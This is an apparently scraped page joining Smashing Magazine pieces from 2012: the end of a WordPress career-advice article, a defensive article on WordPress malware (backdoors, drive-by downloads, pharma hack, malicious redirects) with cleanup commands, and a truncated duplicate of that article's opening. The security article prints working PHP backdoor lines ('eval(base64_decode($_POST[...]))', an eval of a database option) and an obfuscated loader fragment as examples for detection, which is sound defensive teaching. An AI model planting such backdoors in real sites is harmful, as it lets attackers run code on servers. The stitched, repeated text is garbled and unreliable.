WordPress.org isn’t the only place to write about WordPress. If you find a solution to a WordPress problem, write it up on your personal blog. People will find it via Google, and it’ll help them with their own problems. You could also submit a post to a WordPress blog. Many blogs are often looking for guest posts, and some of them are even paid writing gigs! Like providing support, the process of writing things up will make processes and solutions even clearer in your own mind.

Translate WordPress

Around 40% of WordPress downloads are not in the English language — that is a whole lot of non-English language copies of WordPress in the wild. Translating WordPress is a great way to help out and make connections in your local community. Here’s what Zé Fontainhas, the WordPress Polyglots lead, had to say about it:

“Translating WordPress has loads of benefits for you as a WordPress Professional: not only do you increase your karma in both the global and your local community, but in the process you get to look at the code more closely than most. You may pick up bugs or improvements that no one else sees, and this unique perspective will teach you far more about WordPress than the average WordPress user will ever pick up.”

Meet the Community

Working online is great, but there’s nothing like meeting your peers face-to-face to create stronger and deeper relationships. The WordPress Foundation supports two types of WordPress events: WordCamps and Meetups. WordCamps are large annual conferences, usually two days long, at which WordPress experts and enthusiasts gather to share their experience of WordPress. Meetups are more regular, often once a month, and are short informal gatherings that might involve hacking or presentations. Attend events, and, once you feel confident enough, speak at them. Don’t feel that you have to be a WordPress genius to give a presentation. If you’ve done something useful that is worth sharing, then share it. Having been to three WordCamps this year already, I can’t stress how important they are in terms of building relationships, friendships and your profile. You can check out my write-up of WordCamp Netherlands to learn more about them.

Form Relationships

Collaboration, not competition. This is the WordPress way.

— Jane Wells (@janeforshort) August 21, 2012

There are times in the WordPress community when arguments erupt between personalities, and people are yelling at each other on Twitter or flaming in comment threads. But this is the exception, not the norm. While that is going on, there are hundreds of people working on WordPress itself, and thousands of people all over the world building WordPress businesses, who are working at improving WordPress.

From my own experience, I wouldn’t have built my own business if I didn’t have developers to ask dumb questions of, designers to make things look good for me, other WordPress experts to offer advice and help me to improve. At the same time, I offer advice on writing, proofreading and editing where I can. The diverse group of people whom I consider to be my closest WordPress peers have been invaluable in getting me to where I am today, and will no doubt take a role in shaping my future. These relationships are important. Seek out people you can work with and hold on to them.

Get Ahead

Get ahead of the race. (Image: Tambako the Jaguar)

Know Who to Ask

By forming relationships with the right people, you’re on the first step to getting ahead. These don’t need to be the most prominent people, but rather people with knowledge and expertise, people who you can trust. You don’t need to be the best developer to make it in WordPress, sometimes it’s just a matter of knowing the right people to answer your questions. This does not mean (and this is important) that you find out who the best people are and bug them on Twitter, nor should you call people at 4 a.m. to ask them for help finding WordPress themes (true story). By building relationships and interacting with the community, you’ll have a whole collection of people who can help you with issues whether it’s caching or media queries or finding a good developer or finding the right hosting company. Getting ahead isn’t always about being the best at something yourself; it’s just knowing the right people and asking the right questions.

Know What’s Happening

If you want to get ahead, you need to know more than just WordPress as it is in the current release. You should stay up-to-date with what will be appearing in WordPress, and not just in Core but in the wider community. If you’re working with clients in any capacity, you should know what’s in store for them in upcoming WordPress releases. There are plenty of ways to do this.

• Run the nightly builds
  Keep the nightly builds installed on a local WordPress installation. This will keep you up-to-date with any changes as they happen.
• Keep up with Core development
  You can follow what’s going on in Core in a number of ways: following Make WordPress Core, keeping up with the recent development chats and following WordPress Trac. You can also follow @wordpresstrac on Twitter for live updates in your feed.
• Follow user interface (UI) changes
  Major changes to the UI can be confusing for unprepared WordPress users. Keep your clients and customers informed of any updates by watching the Make WordPress UI blog.

Call Things Out (Without Trolling)

Once you’ve gotten to know WordPress well, are engaged with the community and are aware of all of the nuances around it, you’ve gotten yourself into a great position for calling things out when you see a problem. Some problems don’t warrant a public airing, others do. Here are some great examples of criticisms of WordPress or the community that have led to extensive debate and discussion in the comments:

• Brian Krogsgard takes a look at why it’s so hard to love JetPack
• Tony Perez comments on the level of sponsorship for WordCamp San Francisco
• Shane Pearlman talks plugin usability
• Rarst has a rant about the GNU General Public License (GPL)
• Justin Tadlock on the capital_P_dangit() function

Know When to Take a Break

Don’t get rid of your TV, and definitely don’t throw away your computer games, or your books or any of the other things you love to do. For the first few years I worked on WordPress, I was working all day and all night. Even now, I regularly clock off after midnight. Working with WordPress, running your own business and getting involved with the community can be intense. There are a lot of personalities; there are clashes and arguments and upsets that will get to you. This could be anything from a rude person on a support forum, to a flashpoint on Twitter, to just feeling overworked and tired. You need to have things that you can do to switch off and take a break.

Andrea Rennick is part of the support team at StudioPress, co-author of WordPress All-in-One for Dummies and runs WordPress eBooks. She’s an avid quilter.

“I have my sewing table set up right next to my desk. I can swivel from one to the other. Quilting gives my brain something else to work on, whatever problem I may be focused on. It’s hard to be distracted when there is a sharp needle running up & down at top speeds right next to your fingers. It also gets me up and moving, out of my chair. Selecting fabric, cutting the pieces and especially the basting process give me another reason to not sit for yet another hour.”

Whether it’s quilting, opening a bakery, doing yoga, driving fast cars or whatever, it is essential to step back from the WordPress world, switch off your brain and get a little perspective from time to time.

Keep Listening

Once you’ve got to the top, you still need to listen. Other people continue to have different perspectives from you and no matter how right you think you are, there are cases where you are going to be wrong. It may be that you’re so wrapped in WordPress that it takes an absolute beginner to point out something that you’re missing, or you’re lacking the knowledge in a specific area. Getting to the top doesn’t mean you know all things about everything, just that you’re really good about something. Keep listening to those who are also really good, and even those who aren’t.

Miller highlights another great reason to keep listening.

“Look for people’s pain points and frustrations. Those are opportunities to serve people AND make money doing it. The best products and services fill gaps in where WordPress can’t or stops short. Innovate and make something better, which often means saving people time, energy, headaches and money.”

Conclusion

In his article, Wold suggests that the top 20% of developers earn more than $50 an hour. That’s not entirely true. The WordPress survey didn’t only gather info from developers, but from people like me, other WordPress professionals who have built businesses around writing, project management, design, support, blogging, training, consulting or any of the myriad things that you can do with WordPress. And there are plenty of WordPress professionals who are earning far in excess of $50 per hour.

There are other rewards too, beyond the financial. Our world is increasingly fragmentary, especially for those of us who make our livelihoods online. Being part of a community means having people to communicate with, to share ideas and collaborate, to form business partnerships and friendships. If you want to take the easiest route to the top, and have fun while you’re doing it, then it’s by listening, learning, sharing, collaborating and contributing.

(cp)

---

© Siobhan McKeown for Smashing Magazine, 2012.

WordPress security is serious business. Exploits of vulnerabilities in WordPress’ architecture have led to mass compromises of servers through cross-site contamination. WordPress’ extensibility increases its vulnerability; plugins and themes house flawed logic, loopholes, Easter eggs, backdoors and a slew of other issues. Firing up your computer to find that you’re supporting a random cause or selling Viagra can be devastating.

In WordPress’ core, all security issues are quickly addressed; the WordPress team is focused on strictly maintaining the integrity of the application. The same, however, cannot be said for all plugins and themes.

The focus of this post is not to add to the overwhelming number of WordPress security or WordPress hardening posts that you see floating around the Web. Rather, we’ll provide more context about the things you need to protect yourself from. What hacks are WordPress users particularly vulnerable to? How do they get in? What do they do to a WordPress website? In this lengthy article, we’ll cover backdoors, drive-by downloads, pharma hack and malicious redirects. Please notice that some anti-virus apps report this article as malware, probably because it contains examples of the code that should be avoided. This article does not contain any malware itself, so the alert must be based on heuristic analysis.

Over the past two years, Web malware has grown around 140%. At the same time, WordPress has exploded in popularity as a blogging platform and CMS, powering close to 17% of websites today. But that popularity comes at a price; it makes WordPress a target for Web-based malware. Why? Simple: its reach provides the opportunity for maximum impact. Sure, popularity is a good thing, but it also makes us WordPress users vulnerable.

A Bit About Our Security Expert: Meet Tony

Lacking the technical knowledge needed to go into great depth, I brought on board a co-author to help me out. Bringing the technical information is Tony Perez, Chief Operations and Financial Officer of Sucuri Security. Sucuri Security provides detection, alerting and remediation services to combat Web-based malware. In other words, it works on websites that have been compromised. This means that Tony has the background, statistics and, most importantly, knowledge to go really in depth on malware issues that affect WordPress users.

I asked Tony how he got into Web security:

“I think it goes back to 2009. I was managing and architecting large-scale enterprise solutions for Department of Defense (DoD) clients and traveling the world. In the process, there was a little thing called compliance with the Security Technical Implementation Guide (STIG), set forth by the Defense Information Systems Agency (DISA). I know, a mouthful, but it’s how we did things in the DoD; if it didn’t have an acronym, it didn’t belong.

That being said, it wasn’t until I joined Dre and Daniel at Sucuri Security, in early 2011, that I really began to get what I consider to be any resemblance of InfoSec chops.”

Armed with Tony’s technical knowledge, we’ll look at the main issues that affect WordPress users today. But before we get into details, let’s look at some of the reasons why WordPress users might be vulnerable.

What Makes WordPress Vulnerable?

Here’s the simple answer. Old versions of WordPress, along with theme and plugin vulnerabilities, multiplied by the CMS’ popularity, with the end user thrown into the mix, make for a vulnerable website.

Let’s break that down.

The first issue is outdated versions of WordPress. Whenever a new WordPress version is released, users get a nagging message, but plenty of users have gotten pretty good at ignoring the nag. Core vulnerabilities in themselves are rarely an issue. They do exist; proof can be found in the most recent 3.3.3 and 3.4.1 releases. WordPress’ core team has gotten pretty good at rolling out security patches quickly and efficiently, so the risk of exploitation is minimal, provided that WordPress users update their installation. This, unfortunately, is the crux of the problem: WordPress users ignore the message. And it’s not just inexperienced and casual WordPress users who aren’t updating. A recent high-profile hack was of the Reuters website, which was running version 3.1.1 instead of the current 3.4.1.

Vulnerabilities in plugins and themes is another issue. The WordPress repository has 20,000 plugins and is growing. The plugins are of varying quality; some of them inevitably have security loopholes, while others are outdated. On top of that, consider all of the themes and plugins outside of the repository, including commercial products that are distributed for free on Warez websites and come packed with malware. Google is our favorite search engine, but it’s not so hot for finding quality WordPress themes.

Then, there’s popularity. WordPress is popular, without a doubt. Around 700 million websites were recorded as using WordPress in May of this year. This popularity means that if a hacker can find a way into one WordPress website, they have potentially millions of websites for a playground. They don’t need to hack websites that use the current version of WordPress; they can scan for websites that use old insecure versions and hack those.

Finally and most significantly, the biggest obstacle facing WordPress users is themselves. Tony in his own words:

“For whatever reason, there is this perception among WordPress users that the hardest part of the job was paying someone to build the website and that once its built, that’s it, it’s done, no further action required. Maybe that was the case seven years ago, but not today.

WordPress’ ease of use is awesome, but I think it provides a false sense of assurances to end users and developers alike. I think, though, this perception is starting to change.”

From Tony’s experience at Sucuri Security, the most common vulnerabilities to website exploits are:

• Out of date software,
• Poor credential management,
• Poor system administration,
• Soup-kitchen servers,
• Lack of Web knowledge,
• Corner-cutting.

A bit of time and education are all it takes to remedy these issues and to keep your WordPress website secure. This means not just ensuring that you as a WordPress expert are educated, but ensuring that the clients you hand over websites to are as well.

The Evolution Of Attacks

As the Internet has evolved, the nature of hacking has evolved with it. Hacking started out as a very different animal. Back in the day, it was about showing your technical prowess by manipulating a website to do things beyond the webmaster’s intentions; this was often politically motivated. One day you’d wake up and find yourself supporting the opposition in Nigeria or Liberia. These days, hacking is all about money. The recent DNSChanger malware (i.e. the “Internet Doomsday� attack), for example, let hackers rake in close to $14 million before being stopped by the FBI and Estonian police last November.

Another hacking technology that has emerged is malnets. These distributed malware networks are used for everything including identify theft, DDoS attacks, spam distribution, drive-by downloads, fake AV and so on. The hackers automate their attacks for maximum exposure.

Automation through the use of bots is not their only mechanism. Today you also have malware automation: the use of tools to quickly generate a payload (i.e. the infection), allowing the attacker to focus strictly on gaining access to the environment. Once the hacker has access to the environment, they copy and paste in the auto-generated payload. One of the more prevalent automation tools is the Blackhole Exploit Kit. This and many other kits can be purchased online for a nominal fee. That fee buys sustainment services and keeps the kit updated with new tools for the latest vulnerabilities. It’s a true enterprise.

Common WordPress Malware Issues

Thousands of malware types and infections are active on the Internet; fortunately, not all apply to WordPress. For the rest of this post, we’ll look at four of the most common attacks on WordPress users:

• Backdoors,
• Drive-by downloads,
• Pharma hacks,
• Malicious redirects.

Backdoor

A backdoor lets an attacker gain access to your environment via what you would consider to be abnormal methods — FTP, SFTP, WP-ADMIN, etc. Hackers can access your website using the command line or even using a Web-based GUI like this:

A backdoor GUI. Click the image for the whole picture!

Backdoors are exceptionally dangerous. Left unchecked, the most dangerous can cause havoc on your server. They are often attributed to cross-site contamination incidents — i.e. when websites infect other websites on the same server.

How am I attacked?

The attack often happens because of out-of-date software or security holes in code. A vulnerability well known to the WordPress community was found in the TimThumb script that was used for image resizing. This vulnerability made it possible for hackers to upload a payload that functioned as a backdoor.

Here is an example of a scanner looking specifically for vulnerable versions of TimThumb:

What does it look like?

Like most infections, this one can be encoded, encrypted, concatenated or some combination thereof. However, it’s not always as simple as looking for encrypted code; there are several instances in which it looks like legitimate code. Here is an example:

Another example:

Below is a case where the content is hidden in the database and targets WordPress installations:

return @eval(get_option(\’blogopt1\’));

And here is a very simple backdoor that allows any PHP request to execute:

eval (base64_decode($_POST["php"]));

Here is an example of a messy backdoor specifically targeting the TimThumb vulnerability:

Here is another backdoor that commonly affects WordPress installations, the Filesman:

How can I tell whether I’m infected?

Backdoors come in all different sizes. In some cases, a backdoor is as simple as a file name being changed, like this:

• wtf.php
• wphap.php
• php5.php
• data.php
• 1.php
• p.php

In other cases, the code is embedded in a seemingly benign file. For instance, this was found in a theme’s index.php file, embedded in legitimate code:

Backdoors are tricky. They constantly evolve, so there is no definitive way to say what you should look for.

How do I prevent it?

While backdoors are difficult to detect, preventing them is possible. For the hack to be effective, your website needs an entry point that is accessible to the hacker. You can close backdoors by doing the following:

1. Prevent access.
   Make your environment difficult to access. Tony recommends a three-pronged approach to locking down wp-admin:
   • Block IPs,
   • Two-factor authentication,
   • Limited access by default.

   This will make it extremely difficult for anyone except you to access your website.

2. Kill PHP execution.
   Often the weakest link in any WordPress chain is the /uploads/ directory. It is the only directory that needs to be writable in your installation. You can make it more secure by preventing anyone from executing PHP. It’s simple to do. Add the following to the .htaccess file at the root of the directory. If the file doesn’t exist, create it.

<FilesMatch *.php>
Order Deny, Allow
Deny from All
</Files>

How is it cleaned?

Once you have found a backdoor, cleaning it is pretty easy — just delete the file or code. However, finding the file can be difficult. On his blog, Canton Becker provides some advice on ways to scour your server for backdoors. There is no silver bullet for backdoors, though, or for any infection — backdoors can be simple or complex. You can try doing some basic searches for eval and base64_decode, but if your code looks like what’s below, then knowing what to look for becomes more difficult:

$XKsyG=’as’;$RqoaUO=’e’;$ygDOEJ=$XZKsyG.’s’.$RqoaUO.’r’.’t’;$joEDdb=’b’.$XZKsyG.
$RqoaUO.(64).’_’.’d’.$RqoaUO.’c’.’o’.’d’.$RqoaUO;@$ygDOEJ(@$joEDdb(‘ZXZhbChiYXN
lNjRfZGVjb2RlKCJhV1lvYVhOelpY…

If you are familiar with the terminal, you could log into your website using SSH and try certain methods. The most obvious and easiest method is to look for this:

# grep -ri "eval" [path]

Or for this:

# grep -ri "base64_decode" [path]

The r ensures that all files are scanned, while the i ensures that the scan is case-insensitive. This is important because you could find variations of eval: Eval, eVal, evAl, evaL or any other permutation. The last thing you want is for your scan to fall short because you were too specific.

Look for recently modified files:

find -type f -ctime -0 | more

The -type looks for files, and -ctime restricts your scan to the last 24 hours. You can look at the last 24 or 48 hours by specifying -1 or -2, respectively.

Another option is to use the diff command. This enables you to detect the differences between files and directories. In this case, you would use it for directories. For it to be successful, though, you need to have clean copies of your installation and themes. So, this works only if you have a complete backup of your website.

# diff -r /[path]/[directory] /[path]/[directory] | sort

The -r option is recursive through all directories, and the sort command sorts the output and makes it easier to read. The key here is to quickly identify the things that don’t belong so that you can run integrity checks. Anything you find that is in the live website’s directory but not in the backup directory warrants a second look.

Drive-By Downloads

A drive-by download is the Web equivalent of a drive-by shooting. Technically, it is usually embedded on your website via some type of script injection, which could be associated with a link injection.

The point of a drive-by download is often to download a payload onto your user’s local machine. One of the most common payloads informs the user that their website has been infected and that they need to install an anti-virus product, as shown here:

How does the attack get in?

There are a number of ways an attack can get in. The most common causes are:

• Out of date software,
• Compromised credentials (wp-admin, FTP),
• SQL injection.

What does it look like?

Below are a number of examples of link injections that lead to some type of drive-by download attack:

And this:

And this:

More recently, drive-by downloads and other malware have been functioning as conditional malware — designed with rules that have to be met before the infection presents itself. You can find more information about how conditional malware works in Sucuri’s blog post “Understanding Conditional Malware.â€�

How can I tell whether I’m infected?

Using a scanner such as SiteCheck to see whether you are infected is possible. Scanners are pretty good at picking up link injections. Another recommendation is to sign up for Google Webmaster Tools and verify your website. In the event that Google is about to blacklist your website, it would email you beforehand notifying you of the problem and giving you a chance to fix it. The free service could pay dividends if you’re looking to stay proactive.

Outside of using a scanner, the difficulty in identifying an infection will depend on its complexity. When you look on the server, it will look something like this:

The good news is that such an infection has to be somewhere where an external output is generated. The following files are common places where you’ll find link injections:

• wp_blog_header.php (core file)
• index.php (core file)
• index.php (theme file)
• function.php (theme file)
• header.php (theme file)
• footer.php (theme file)

About 6 times out of 10, the infection will be in one of those files. Also, your anti-virus software might detect a payload being dropped onto your computer when you visit your website — another good reason to run anti-virus software locally.

Sucuri has also found link injections embedded in posts and pages (as opposed to an originating PHP file), as well as in text widgets. In such cases, scrub your database and users to ensure that none of your accounts have been compromised.

How is it cleaned?

Cleaning can be a challenge and will depend on your technical skill. You could use the terminal to find the issue.

If you have access to your server via SSH, you’re in luck. If you don’t, you can always download locally. Here are the commands that will be of most use to you when traversing the terminal:

• CURL
  Used to transfer data with a URL syntax.
• FIND
  Search by file or directory name.
• GREP
  Search for content in files.

For example, to search all of your files for a particular section of the injection, try something like this:

$ grep -r "http://objectcash.in" .

Including the following characters is important:

• "
  Maintains the integrity of the search. Using it is important when you’re searching for special characters because some characters have a different meaning in the terminal.
• -r
  Means “recursive� and will traverse all directories and files.

You can also refine your search by file type:

$ grep --include ".php" -r "http://objectcash.in" .

Enabling the --include option allows you to specify file type; in this instance, only PHP files.

These are just a few tricks. Once you’ve located the infection, you have to ensure that you remove every instance of it. Leaving just one could lead to serious frustration in the future.

Pharma Hack

Pharma hack is one of the most prevalent infections around. It should not be confused with malware; it’s actually categorized as SPAM — “stupid pointless annoying messages.â€� If you’re found to be distributing SPAM, you run the risk of being flagged by Google with the following alert:

This site may be compromised!!

This is what it will look like on Google’s search engine results page (SERP):

How am I attacked?

The pharma SPAM injection makes use of conditional malware that applies rules to what the user sees. So, you may or may not see the page above, depending on various rules. This is controlled via code on the server, such as the following:

Some injections are intelligent enough to create their own nests within your server. The infection makes use of $_SERVER["HTTP_REFERER"], which redirects the user to an online store that is controlled by the attacker to generate revenue. Here is an example of such a monetized attack:

Like most SPAM-type infections, pharma hack is largely about controlling traffic and making money. Money can be made through click-throughs and/or traffic. Very rarely does a pharma hack injection redirect a user to a malicious website that contains some additional infection, as with a drive-by download attempt.

This is why it’s so difficult to detect. It’s not as simple as querying for “Cialis� or “Viagra,� although that’d be awesome. Most people would be surprised by the number of legitimate pharmaceutical companies that exist and publish ads on the Web. This adds to the challenge of detecting these infections.

What does it look like?

Pharma hack has evolved, which has made it more difficult to detect. In the past, SPAM injections would appear in your pages, where they were easy to find and, more importantly, remove.

Today, however, pharma hack is quite different. It uses a series of backdoors, sprinkled with intelligence, to detect where traffic is coming from, and then it tells the infection how to respond. Again, it can behave as conditional malware. More and more, pharma hack reserves its payload for Google’s bots; the goal is to make it onto Google’s SERPs. This provides maximum exposure and the biggest monetary return for the hackers.

Here’s an image of an old pharma hack injecting SPAM into a blog’s tags:

Another version of pharma hack was injected in such a way that when the user clicks on an apparently benign link (such as “Home,� “About� or “Contact�), it redirects the user to a completely different page. Somewhere like this:

How do I tell whether I’m infected?

Identifying an infection can be very tricky. In earlier permutations, identifying an infection was as easy as navigating your website, looking at your ads, links, posts and pages, and quickly determining whether you’ve been infected. Today, there are more advanced versions that are harder to find.

The good news for diligent webmasters is that by enabling some type of auditing or file monitoring on your WordPress website, you’ll be able to see when new files have been added or when changes have been made. This is by far one of the most effective methods of detection.

You could try using free scanners, such as SiteCheck. Unfortunately, many HTTP scanners, including Sucuri’s, struggle with the task because pharma hack is not technically malicious, so determining the validity of content can be difficult for a scanner.

How is it cleaned?

First, identify the infected files, and then remove them. You can use the commands we’ve outlined above, and you can make queries to your website via the terminal to quickly see whether you’re serving any pharma SPAM to your visitors.

When combatting pharma hacks, one of the most useful commands is grep. For example, to search for any of the ads or pharma references being flagged, run this:

# egrep -wr 'viagra|pharmacy' .

By using egrep, we’re able to search multiple words at the same time if necessary, thus saving you time in this instance.

Or try something like this:

# grep -r "http://canadapharmacy.com" .

This only works if the infection is not encoded, encrypted or concatenated.

Another useful method is to access your website via different user agents and referrers. Here is an example of what one website looked like when using a Microsoft IE 6 referrer:

Try Bots vs Browsers to check your website through a number of different browsers.

Terminal users can also use CURL:

# curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" http://somesite.com

How do I prevent it?

Preventing a pharma hack can be tricky. Sucuri has found that the hack regularly exploits vulnerable out-of-date software. However, your out-of-date WordPress installation is not necessarily the problem. Even if you are up to date, another outdated installation on the same server could be vulnerable to the infection. If the real payload resides elsewhere on your server, not within your website’s directory, then catching it can be exceptionally difficult.

Here is an example of what you might be looking for if you can’t find the infection in your own installation:

To prevent a pharma hack, you should do two things:

1. Keep your software up to date,
2. Steer clear of soup-kitchen servers.

Malicious Redirects

A malicious redirect sends a user to a malicious website. In 2010, 42,926 new malicious domains were detected. In 2011, this number grew to 55,294. And that just includes primary domains, not all of their subdomains.

When a visitor is redirected to a website other than the main one, the website may or may not contain a malicious payload. Suppose you have a website at myhappysite.com; when someone visits it, the website could take the visitor to meansite.com/stats.php, where the malicious payload is in that website’s stats.php file. Or it could be a harmless website with just ads and no malicious payload.

How am I attacked?

As with many malware attacks, it comes down to access. The malicious redirect could be generated by a backdoor. The hacker would scan for a vulnerability, such as TimThumb or old versions of WordPress and, when they find it, upload a payload that functions as a backdoor.

What does it look like?

Detecting a redirect is not as complex as detecting some of the other infections. It is often found in your .htaccess file and looks something like this:

Or like this:

There may be instances where a redirect is encoded and resides in one of your PHP files. If so, it will usually be found in your header.php, footer.php or index.php file; it has also been known to reside in the root index.php file and in other core template files. It is not always encoded, but if it is, it will look something like this:

How do I tell if I am infected?

There are a few ways to check for infections. Here are some suggestions:

• Use a free scanner, such as SiteCheck. They very rarely miss malicious redirects.
• Test using Bots vs Browser.
• Listen to your users. You might not detect the redirect, but sometimes a user will alert you to it.

If a user does detect a problem, ask them pertinent questions to help diagnose the problem:

• What operating system are they using?
• What browser(s) are they using, and which version(s)?

The more information you get from them, the better you can replicate the issue and find a fix.

How is it cleaned?

Malicious redirects are one of the easiest infections to clean. Here’s a good starting point:

1. Open your .htaccess file.
2. Copy any rewrite rules that you have added yourself
3. Identify any malicious code, like the sample above, and remove it from the file. Scroll all the way to the bottom of .htaccess to make sure there aren’t any error directives pointing to the same infection.

Be sure to also look for all .htaccess files on the server. Here is one quick way to see how many exist on your server:

# find [path] -name .htaccess -type f | wc -l

And this will tell you where exactly those files are:

# find [path] -name .htaccess -type f | sort

The infection is not always restricted there, though. Depending on the infection, you might also find the redirect encoded and embedded in a file such as index.php or header.php.

Alarmingly, these infections can replicate across all of your .htaccess files. The backdoor responsible for it can also be used to create multiple .htaccess files across all of your directories, all with the same infection. Removing the infection can feel like an uphill struggle, and sometimes cleaning every file you can find is not enough. There are even cases where a file is created outside of the Web directory. The lesson is always look outside of your Web directory as well as within it.

How do I prevent it?

A quick and easy method is to change ownership of the file, or to reduce the file’s permissions so that only the owner has permission to modify it. However, if your root account is compromised, that won’t do you much good.

The most important file to take care of is .htaccess. Check out the tutorial “Protect Your WordPress Site with .htaccessâ€� for tips on doing that.

Conclusion

There you have it: four prevalent attacks that cause havoc across many WordPress installations today. You might not feel better if you get hacked, but hopefully, with this bit of knowledge, you’ll feel more confident that the hack can be cleaned and that your website can be returned to you. Most importantly, if you take one thing away from this: always keep WordPress updated.

Tony’s Top Ten Security Tips

1. Get rid of generic accounts, and know who is accessing your environment.
2. Harden your directories so that attackers can’t use them against you. Kill PHP execution.
3. Keep a backup; you never know when you’ll need it.
4. Connect securely to your server. SFTP and SSH is preferred.
5. Avoid soup-kitchen servers. Segment between development, staging and production.
6. Stay current with your software — all of it.
7. Kill unnecessary credentials, including for FTP, wp-admin and SSH.
8. You don’t need to write posts as an administrator, nor does everyone need to be an administrator.
9. If you don’t know what you’re doing, leverage a managed WordPress hosting provider.
10. IP filtering + Two-factor authentication + Strong credentials = Secure access

Tony’s Most Useful Security Plugins

• Sucuri Sitecheck Malware Scanner
  This plugin from Tony and the Sucuri crew enables full malware and blacklist scanning in your WordPress dashboard, and it includes a powerful Web application firewall (WAF).
• Login Lock
  This enforces strong password policies, locks down log-ins, monitors log-ins, blocks hacker IPs and logs out idle users.
• Two-Factor Authentication
  This plugin enables Duo’s two-factor authentication, using a service such as a phone callback or SMS message.
• Theme-Check
  Test your theme to make sure it’s up to spec with theme review standards.
• Plugin-Check
  Does what Theme-Check does but for plugins.

Security Tools

• Sucuri SiteCheck
• Unmask Parasites scanner

Security Resources

• Sucuri Blog
• “Securityâ€�, Perishable Press
• Unmask Parasites Blog
• Badware Busters
• WPsecure
• Locking Down WordPress, Michael Pick

Useful Security Articles

• “10 Useful WordPress Security Tweaks,â€� Jean-Baptiste Jung
• “10 Steps to Secure Your WordPress Installation,â€� Fouad Matin
• “Google Blacklist Warnings: Something’s Not Right Here,â€� Tony Perez
• “Hardening WordPress,â€� WordPress Codex
• “How to Stop the Hacker and Ensure Your Site Is Locked,â€� Tony Perez
• “Website Malware Removal: WordPress Tips and Tricks,â€� Tony Perez

(al)

---

© Siobhan McKeown for Smashing Magazine, 2012.

WordPress security is serious business. Exploits of vulnerabilities in WordPress’ architecture have led to mass compromises of servers through cross-site contamination. WordPress’ extensibility increases its vulnerability; plugins and themes house flawed logic, loopholes, Easter eggs, backdoors and a slew of other issues. Firing up your computer to find that you’re supporting a random cause or selling Viagra can be devastating.

In WordPress’ core, all security issues are quickly addressed; the WordPress team is focused on strictly maintaining the integrity of the application. The same, however, cannot be said for all plugins and themes.

The focus of this post is not to add to the overwhelming number of WordPress security or WordPress hardening posts that you see floating around the Web. Rather, we’ll provide more context about the things you need to protect yourself from. What hacks are WordPress users particularly vulnerable to? How do they get in? What do they do to a WordPress website? In this lengthy article, we’ll cover backdoors, drive-by downloads, pharma hack and malicious redirects. Please notice that some anti-virus apps report this article as malware, probably because it contains examples of the code that should be avoided. This article does not contain any malware itself, so the alert must be based on heuristic analysis.

Over the past two years, Web malware has grown around 140%. At the same time, WordPress has exploded in popularity as a blogging platform and CMS, powering close to 17% of websites today. But that popularity comes at a price; it makes WordPress a target for Web-based malware. Why? Simple: its reach provides the opportunity for maximum impact. Sure, popularity is a good thing, but it also makes us WordPress users vulnerable.

A Bit About Our Security Expert: Meet Tony

Lacking the technical knowledge needed to go into great depth, I brought on board a co-author to help me out. Bringing the technical information is Tony Perez, Chief Operations and Financial Officer of Sucuri Security. Sucuri Security provides detection, alerting and remediation services to combat Web-based malware. In other words, it works on websites that have been compromised. This means that Tony has the background, statistics and, most importantly, knowledge to go really in depth on malware issues that affect WordPress users.

I asked Tony how he got into Web security:

“I think it goes back to 2009. I was managing and architecting large-scale enterprise solutions for Department of Defense (DoD) clients and traveling the world. In the process, there was a little thing called compliance with the Security Technical Implementation Guide (STIG), set forth by the Defense Information Systems Agency (DISA). I know, a mouthful, but it’s how we did things in the DoD; if it didn’t have an acronym, it didn’t belong.

That being said, it wasn’t until I joined Dre and Daniel at Sucuri Security, in early 2011, that I really began to get what I consider to be any resemblance of InfoSec chops.”

Armed with Tony’s technical knowledge, we’ll look at the main issues that affect WordPress users today. But before we get into details, let’s look at some of the reasons why WordPress users might be vulnerable.

What Makes WordPress Vulnerable?

Here’s the simple answer. Old versions of WordPress, along with theme and plugin vulnerabilities, multiplied by the CMS’ popularity, with the end user thrown into the mix, make for a vulnerable website.

Let’s break that down.

The first issue is outdated versions of WordPress. Whenever a new WordPress version is released, users get a nagging message, but plenty of users have gotten pretty good at ignoring the nag. Core vulnerabilities in themselves are rarely an issue. They do exist; proof can be found in the most recent 3.3.3 and 3.4.1 releases. WordPress’ core team has gotten pretty good at rolling out security patches quickly and efficiently, so the risk of exploitation is minimal, provided that WordPress users update their installation. This, unfortunately, is the crux of the problem: WordPress users ignore the message. And it’s not just inexperienced and casual WordPress users who aren’t updating. A recent high-profile hack was of the Reuters website, which was running version 3.1.1 instead of the current 3.4.1.

Vulnerabilities in plugins and themes is another issue. The WordPress repository has 20,000 plugins and is growing. The plugins are of varying quality; some of them inevitably have security loopholes, while others are outdated. On top of that, consider all of the themes and plugins outside of the repository, including commercial products that are distributed for free on Warez websites and come packed with malware. Google is our favorite search engine, but it’s not so hot for finding quality WordPress themes.

Then, there’s popularity. WordPress is popular, without a doubt. Around 700 million websites were recorded as using WordPress in May of this year. This popularity means that if a hacker can find a way into one WordPress website, they have potentially millions of websites for a playground. They don’t need to hack websites that use the current version of WordPress; they can scan for websites that use old insecure versions and hack those.

Finally and most significantly, the biggest obstacle facing WordPress users is themselves. Tony in his own words:

“For whatever reason, there is this perception among WordPress users that the hardest part of the job was paying someone to build the website and that once its built, that’s it, it’s done, no further action required. Maybe that was the case seven years ago, but not today.

WordPress’ ease of use is awesome, but I think it provides a false sense of assurances to end users and developers alike. I think, though, this perception is starting to change.”

From Tony’s experience at Sucuri Security, the most common vulnerabilities to website exploits are:

• Out of date software,
• Poor credential management,
• Poor system administration,
• Soup-kitchen servers,
• Lack of Web knowledge,
• Corner-cutting.

A bit of time and education are all it takes to remedy these issues and to keep your WordPress website secure. This means not just ensuring that you as a WordPress expert are educated, but ensuring that the clients you hand over websites to are as well.

The Evolution Of Attacks

As the Internet has evolved, the nature of hacking has evolved with it. Hacking started out as a very different animal. Back in the day, it was about showing your technical prowess by manipulating a website to do things beyond the webmaster’s intentions; this was often politically motivated. One day you’d wake up and find yourself supporting the opposition in Nigeria or Liberia. These days, hacking is all about money. The recent DNSChanger malware (i.e. the “Internet Doomsday� attack), for example, let hackers rake in close to $14 million before being stopped by the FBI and Estonian police last November.

Another hacking technology that has emerged is malnets. These distributed malware networks are used for everything including identify theft, DDoS attacks, spam distribution, drive-by downloads, fake AV and so on. The hackers automate their attacks for maximum exposure.

